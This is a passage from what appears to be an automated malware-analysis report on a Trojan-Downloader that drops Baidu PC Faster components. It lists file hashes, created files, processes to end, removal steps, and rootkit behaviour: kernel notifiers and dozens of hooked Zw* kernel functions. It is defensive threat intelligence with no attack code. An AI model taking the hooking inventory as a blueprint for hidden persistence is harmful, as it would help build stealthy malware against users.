[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 68d50987ca3718f76f666ca3ed45f125 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Baidu_Secure_SystemUp_5.0.4.87531.exe |
| 4cc9cd5427ed9526c48b59dfa41c98ab | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\PC_Faster_Setup_Mini_B104_144327560.exe |
| a9c5b72ee0063b8a6d28ec99127c0e9a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsmC0.tmp\BHips.dll |
| beb1924f868e94aa16e3288a2a81972b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsmC0.tmp\Communication.dll |
| 91780b8f9edc47fcd34c16d3c4655211 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsmC0.tmp\InstallUtility.dll |
| 6a17e66793ccaf17d01b71c381f35cd1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsmC0.tmp\LogReporter.exe |
| ef794cdfc47e0904cd6e9498b95669b4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsmC0.tmp\log.dll |
| b4a7694d798fd0cd508269fb7e2b0360 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsmC0.tmp\log2.dll |
| ca0198e4431779a1abe8d5887a03316d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\yet_another_cleaner_mat.exe |
| d2f03faccd3657a09bc89f831a17cc30 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BETManger.dll |
| 8fdbe03d32bafc8fde004c966a0f5a53 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BEVMApi001.dll |
| c0e1a9d795c3f6a20a08e6b7c692a914 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BEVMEngine.dll |
| a9c5b72ee0063b8a6d28ec99127c0e9a | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BHips.dll |
| 2e0e0935f30edfffba970b63fdc0f23e | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BProtectEx.sys |
| 71e5154b386c6c46279027c3d3c1a2b9 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BProtectEx64.sys |
| 21b5b675cdeed1a439f273c0a6141716 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BaiduStore.dll |
| aeb73dee6240d7efca9954348d9378e9 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\BdApiUtil.dll |
| be125797a510cd7e9e77d0d79cb989ef | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Bhbase.sys |
| c6e105c07104f4d2cc4781a861664fc3 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\CP.dll |
| 97675745b0ee49bde212be051e310f99 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\CloudOPTClient.exe |
| beb1924f868e94aa16e3288a2a81972b | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Communication.dll |
| cc4a3f7204d91b6c1f354449981acc4f | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\CrashReport.exe |
| 51d5a1ba8f9c22e190a7e802389e73e1 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\CrashUL.exe |
| ff5a41f8d7f75a4a382b409e7ce40281 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\DataReport.dll |
| 2e8b5849618ae0b486e96cf4b828c384 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\DeepClean.exe |
| 0cb21001ceb1c1dbbf7c04a5e21a3909 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\DeepOptimization.exe |
| a43cef6188f827c358e79584ab3d13ab | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\DirectUI.dll |
| 692a4fa095694ef995ff31d96c330c0b | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\EnumModules.exe |
| 03cf9bf0d73a6da2fa1527edfff4b679 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\FasterNow.exe |
| 7ac1627af5abd5925905b3e671a85f80 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\HipsDR.dll |
| 6b9f0a7bec15fe04c01107ccaa248151 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\HipsHB.dll |
| 49e1bd200cce060485902770f74d6c76 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\HipsHp.dll |
| d056c973a510072e9ab8fc6f3339c088 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\HipsPop.exe |
| 4f74425b51c481146176e92306a17309 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\IEProtect.exe |
| 6a17e66793ccaf17d01b71c381f35cd1 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\LogReporter.exe |
| 89ac31331673c27ebf9a7a5d6cd743ae | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\NSISInstall.exe |
| f3781cab80bea133a28811c8df3a1974 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\NewFeatures.exe |
| 829d16425b9d21ebb6efacd292c00d33 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\NewUpdater.exe |
| 7f56fd57ebbe781608d1c60bd6c1d47c | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFApiUtil.sys |
| 5ca2e4e0923ee93108b76fb8f14e9301 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFApiUtil64.sys |
| 7bf7654bce781d01af1e4d76c5118da0 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFHelper.exe |
| 51abe24dbdc5555e3def142bd77d14de | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFPopups.exe |
| ae08f59a41f0c5e9d6410e1244e98108 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe |
| 19c7194f330842eac0fa2de56d854d9d | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFaster.exe |
| 22f18dc888bdff086c6b1cfbbb70b391 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFasterFeedback.exe |
| 4f8ac1978a3711e18104adfb036386b7 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PCFasterSvc.exe |
| dcc373c23cee9268f9e2a02b80ef8a38 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Antivirus\Plugin_Antivirus.dll |
| 93645755b5a4056a6c192ed13a7c50f9 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\CleanerEngine.dll |
| bcf3fc7216c1200a88cf0f6286230504 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Plugin_Cleaner.dll |
| eb19f9b312f6ae421778e092bf8d1d35 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Facebook\Plugin_Facebook.dll |
| 257a6c36739de4675ea80061fcb9e10d | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.HomeEx\Plugin_HomeEx.dll |
| 99ecf31c6158ac19b954b0107a555b42 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\Plugin_OptimizerEx.dll |
| 6b9c0dde64f47719e0ba5162efeda8a6 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOptEngine.dll |
| 58c611a556f9d47f4f6246de79f58ea5 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\PopupTip.exe |
| 4f8ac1978a3711e18104adfb036386b7 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\SysOptEngineSvc.exe |
| cd0a9dcf5387d454d25c368602244a43 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Uninstall.exe |
| 8da1fed6d924cce80efb71ae37b58c2c | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\Updater.exe |
| 92102836e55c4b3ef022edd071abb00b | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\WebClient.dll |
| 88d62065f635baae190eccf04a37a4fe | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\dbghelp.dll |
| 1b5c104c247b5d45268811361e868c69 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\liveupdate.exe |
| ef794cdfc47e0904cd6e9498b95669b4 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\log.dll |
| b4a7694d798fd0cd508269fb7e2b0360 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\log2.dll |
| 7e9bec8fd8acc5492dae419558cf6cd0 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\log64.dll |
| 2047251c8a8fb23c1b6d12caf3be7d9f | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\plugscan\BavPc.dll |
| 9d20e33e1a1f26bce5b731d83f126351 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\plugscan\EnumModules.exe |
| f067725a3dc97dc5cdb268883a336673 | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\sqlite.dll |
| a009f55523eda11c9fd0a778db662eab | c:\Program Files\Baidu Security\PC Faster\5.0.0.0\update.dll |
| b5fc476c1bf08d5161346cc7dd4cb0ba | c:\Program Files\Pci Recovery\lua5.1.dll |
| dec931e86140139380ea0df57cd132b6 | c:\Program Files\Pci Recovery\uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\Bhbase.sys" the Trojan-Downloader controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\drivers\Bhbase.sys" the Trojan-Downloader controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\drivers\Bhbase.sys" the Trojan-Downloader controls loading executable images into a memory by installing the Load image notifier.
The Trojan-Downloader installs the following kernel-mode hooks:
ZwAssignProcessToJobObject
ZwCreateFile
ZwCreateKey
ZwCreateProcess
ZwCreateProcessEx
ZwCreateSection
ZwCreateSymbolicLinkObject
ZwCreateThread
ZwDeleteFile
ZwDeleteKey
ZwDeleteValueKey
ZwDeviceIoControlFile
ZwDuplicateObject
ZwEnumerateValueKey
ZwLoadDriver
ZwOpenProcess
ZwOpenSection
ZwOpenThread
ZwProtectVirtualMemory
ZwQueryValueKey
ZwQueueApcThread
ZwRenameKey
ZwRequestWaitReplyPort
ZwRestoreKey
ZwSetContextThread
ZwSetInformationFile
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetValueKey
ZwSuspendThread
ZwSystemDebugControl
ZwTerminateProcess
ZwTerminateThread
ZwUnmapViewOfSection
ZwWriteFile
ZwWriteVirtualMemory
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:384
PCFasterSvc.exe:1628
LogReporter.exe:2200
LogReporter.exe:2412
LogReporter.exe:2160
Updater.exe:2444
sc.exe:964
sc.exe:1524
sc.exe:676
sc.exe:1704
sc.exe:1660
Baidu_Secure_SystemUp_5.0.4.87531.exe:1692
PC_Faster_Setup_Mini_B104_144327560.exe:1284
MiniService.exe:1708
MiniService.exe:2020
MiniService.exe:844
MiniService.exe:652
schtasks.exe:1544
schtasks.exe:1568
schtasks.exe:136
schtasks.exe:1676
schtasks.exe:224
schtasks.exe:1740
schtasks.exe:2032
PopupTip.exe:2760
~dlBD.exe:1160
cscript.exe:2440
irsetup.exe:508
iSafeDownloader.exe:1544
yet_another_cleaner_mat.exe:1576 - Delete the original Trojan-Downloader file.
- Delete or disinfect the following files created/modified by the Trojan-Downloader:
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (64 bytes)
%System%\drivers\BprotectEx.sys (601 bytes)
%System%\drivers\Bhbase.sys (47 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\DataReport-20141220.log (578 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\LogReporter-20141220.log (1580 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\SysOptEngineSvc-20141220.log (809 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SysOptEngineSvc.exe (5873 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\PCFTray-20141220.log (869 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\config.ini (508 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\PCFasterSvc-20141220.log (1219 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavClean.dll (220 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.LeakRepair\LeakDB-x86-1033.dat (10477 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vn.dat (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavConfig.ini.7z (814 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavFi.dll (80 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavBase.dll.7z (851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\log.dll (104 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\ac.dat.7z (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\AudioList.dat (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\url.ini-0x230ff48ccb9a7fa5cd6da5797287963a.diff (148 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\tg.dat (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavScan.dll (201 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\GameList.xml (3814 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavWl.dll (234 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\server_respond.xml (422 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\AudioList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sqlite.dll.7z (2851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\dbghelp.dll (7386 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiNpc.dat (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\bdMiniDownloaderNoUITH_PCF-Mini.exe.7z (5451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUa.dll.7z (2851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\DataFileList.xml.7z (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\fs.dat.7z (414 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSk.dll (94 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavCs.dll (227 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BHips.dll (3739 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\defcfg.ini.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSig.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavVt.dll.7z (47 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\DataFileVer.xml (303 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\dbghelp.dll.7z (3851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\version.xml.7z (279 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData\rpFile-Updater-2014-12-20 12-35-17-0201-[17113].tmp (490 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BaiduStore.dll (7386 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUp.dll (183 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BHips.dll-0xa9c5b72ee0063b8a6d28ec99127c0e9a.diff (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavFi.dll.7z (32 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavAs.dll (3700 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Optimizer\SysOpt\optlist.dat (12289 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\BrowserList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavPro_Setup_Mini_GL1.exe.7z (7251 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx.sys (115 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vn.dat.7z (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vr.dat.7z (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Communication.dll (1621 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSk.dll.7z (44 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\bdMiniDownloaderNoUITH_PCF-Mini.exe-0x28c94e73ef2c18ee861292961f5add28.diff (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx64.sys (94 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\qs.dat (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiMac.dat (23 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sc.ini (264 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiMac.dat.7z (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\CloudOPTClient.exe (6404 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUp.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\ProgramFileList.xml.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Optimizer\SysOpt\optlist.dat-0x0d834fc92c5eeedc70c799e68d92bc1d.diff (1451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BaiduStore.dll.7z (2851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\log.dll.7z (46 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update_ultimate.ini (431 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\CloudOPTClient.exe-0x97675745b0ee49bde212be051e310f99.diff (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\qs.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\PhotoList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\ag.dat.7z (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSu.dll.7z (2051 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiNpc.dat.7z (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Communication.dll.7z (851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx64.sys-0x71e5154b386c6c46279027c3d3c1a2b9.diff (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BCloudScan.exe.7z (4451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavCs.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\FileList.xml (1627 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sc.ini.7z (247 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update_statistic.xml (336 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavScan.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\Updater-20141220.log (75383 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavAs.dll.7z (851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavData.dll (126 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\wi.dat.7z (12131 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\tg.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\GameList.xml.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavData.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavWl.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\VideoList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx.sys-0x2e0e0935f30edfffba970b63fdc0f23e.diff (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavClean.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavQv.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\ieprotect\ieprotect.bskin (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\common\common.bskin (371 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1056.WhiteSmkeUSNew.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1198.SaveClicker.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1181.Highlightly.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10017.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\citys.txt (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1089.DVDVideoSoftToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1136.AF_HSS.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\lang.ini (110 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\1.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1126.Hao123SearchRemovalTool.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1151.NinjaSavings.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0029.FreeRARExtractFrog.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\13.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Facebook\res\res.bskin (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10123.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log2.dll (12088 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1056.WhiteSmkeUSNew.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\ZTE_off.png (463 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\IEProtect.ini (420 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1147.EntrustedToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1181.Highlightly.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1101.VAFMusic.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1055.WhiteSmoke.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1083.PriceGong.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\lang.ini (110 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dir.ini (494 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BProtectEx64.sys (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1157.AppsHat.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0002.MyPCBackup.rul (661 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\update\update.bskin (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1143.BrowserPlus2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.6.2.def.db (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\confirm\confirm.bskin (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DataFileList.xml (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1155.CouponChaser.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1062.OnlineRadioPlayerRecorderToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1163.BubbleDock.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\LG_on.png (628 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0026.KaraFun.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1055.WhiteSmoke.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\BaiduSafe\BaiduSafe.bskin (5520 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\VDownloader_Ask.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1061.SearchProtect.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\3.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1108.SmartSuggestor.rul (256 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\FasterNow.exe (29256 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1122.Mysearchdial.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10004.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1150.DealSlider.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10027.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\8.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsDR.dll (14184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\BugReporter\BugReporter.bskin (927 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1125.NCH_ENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\res\res.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\CouponDropDown.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFaster.exe (39770 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1133.Mp3TubeToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\FasterNow\FasterNow.bskin (7192 bytes)
